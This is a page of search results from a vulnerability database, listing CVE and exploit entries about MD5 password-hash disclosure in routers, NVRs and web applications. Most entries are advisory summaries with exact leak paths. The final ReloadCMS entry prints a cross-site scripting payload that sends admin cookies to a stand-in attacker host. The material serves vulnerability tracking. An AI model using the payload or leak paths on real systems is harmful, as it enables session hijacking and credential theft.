Lucene search
K

26 matches found

0day.today
0day.today
added 2018/08/23 12:0 a.m.56 views

Geutebrueck re_porter 7.8.974.20 - Credential Disclosure Vulnerability

Exploit for hardware platform in category web applications Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version:...

0.4AI score0.32447EPSS
Exploits5
Cvelist
Cvelist
added 2017/09/11 9:0 a.m.16 views

CVE-2017-14262

On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter...

8.1AI score0.04426EPSS
Exploits0References1
CVE
CVE
added 2017/09/11 9:0 a.m.45 views

CVE-2017-14262

CVE-2017-14262 affects Samsung NVR devices. Remote attackers can read the MD5 hash of the admin password via szUserName JSON data sent to cgi-bin/main-cgi and then use that hash in szUserPasswd to log in. The vulnerability is network-exposed with high impact (confidentiality/integrity/availabilit...

9.3CVSS8AI score0.04426EPSS
Exploits0References1Affected Software1
NVD
NVD
added 2014/11/01 10:55 a.m.24 views

CVE-2014-8243

Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...

3.3CVSS6.9AI score0.01204EPSS
Exploits1References1
Prion
Prion
added 2014/11/01 10:55 a.m.21 views

Design/Logic Flaw

Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...

3.3CVSS7.5AI score0.01204EPSS
Exploits1References1Affected Software10
Cvelist
Cvelist
added 2014/11/01 10:0 a.m.35 views

CVE-2014-8243

Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remot...

6.9AI score0.01204EPSS
Exploits1References1
CVE
CVE
added 2014/11/01 10:0 a.m.57 views

CVE-2014-8243

CVE-2014-8243 affects Linksys SMART Wi‑Fi firmware on EA2700/EA3500 and other models; a remote, unauthenticated attacker can read the administrator’s MD5 password hash by requesting /.htpasswd. Affected firmware versions include 2.1.41/1.1.41/1.1.40/1.1.42 build variants across E4200v2, EA4500, E...

3.3CVSS7.2AI score0.01204EPSS
Exploits1References1Affected Software2
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.34 views

nodez <= 4.6.1.1 mercury Multiple Vulnerabilities

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; / software: site: nodez.greentinted.com/ description:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.25 views

ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit

No description provided by source. ----------------------------Information------------------------------------------------ +Name :ilchClan = 1.0.5B SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +email : [email protected] +Date : 15.04.2010 +Script : ilchClan = 1.0.5B...

7.1AI score
Exploits0
Prion
Prion
added 2008/08/29 4:41 p.m.12 views

Cross site request forgery (csrf)

Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php...

5CVSS7.3AI score0.02615EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2008/08/29 4:22 p.m.13 views

CVE-2008-3859

Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php...

6.8AI score0.02615EPSS
Exploits0References4
Prion
Prion
added 2008/03/26 10:44 a.m.18 views

Default credentials

ZyXEL Prestige routers, including P-660, P-661, and P-662 models with firmware 3.40PE9 and 3.40AGD.2 through 3.40AHQ.3, do not use a salt when calculating an MD5 password hash, which makes it easier for attackers to crack passwords...

5CVSS7.3AI score0.0089EPSS
Exploits0References3Affected Software19
NVD
NVD
added 2007/11/10 2:46 a.m.11 views

CVE-2007-5919

MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt...

5CVSS6.5AI score0.01218EPSS
Exploits0References4
Prion
Prion
added 2007/11/10 2:46 a.m.14 views

Improper access control

MyWebFTP, possibly 5.3.2, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain an MD5 password hash via a direct request for pass/pass.txt...

5CVSS7.1AI score0.01218EPSS
Exploits0References4
CVE
CVE
added 2007/11/10 2:0 a.m.39 views

CVE-2007-5919

The CVE-2007-5919 entry concerns MyWebFTP (likely version 5.3.2) where sensitive data is stored under the web root with weak access controls, enabling remote retrieval of an MD5 password hash by directly requesting pass/pass.txt. This vulnerability is described across multiple sources (NVD, CVE l...

5CVSS6.5AI score0.01218EPSS
Exploits0References4Affected Software1
Prion
Prion
added 2007/09/18 7:17 p.m.16 views

Improper access control

CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...

5CVSS7AI score0.02581EPSS
Exploits1References5
NVD
NVD
added 2007/09/18 7:17 p.m.14 views

CVE-2007-4937

CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...

5CVSS6.5AI score0.02581EPSS
Exploits1References5
CVE
CVE
added 2007/09/18 7:0 p.m.44 views

CVE-2007-4937

CVE-2007-4937 affects CS Guestbook. The vulnerability arises from insufficient access control that allows remote attackers to retrieve sensitive data (admin name and MD5 password hash) by directly requesting base/usr/0.php. The description in connected sources confirms the issue but does not prov...

5CVSS6.5AI score0.02581EPSS
Exploits1References5Affected Software1
Cvelist
Cvelist
added 2007/09/18 7:0 p.m.23 views

CVE-2007-4937

CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php...

6.5AI score0.02581EPSS
Exploits1References5
Packet Storm
Packet Storm
added 2006/04/11 12:0 a.m.24 views

ReloadCMS-1.2.5.txt

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

7.4AI score
Exploits0
Rows per page
Query Builder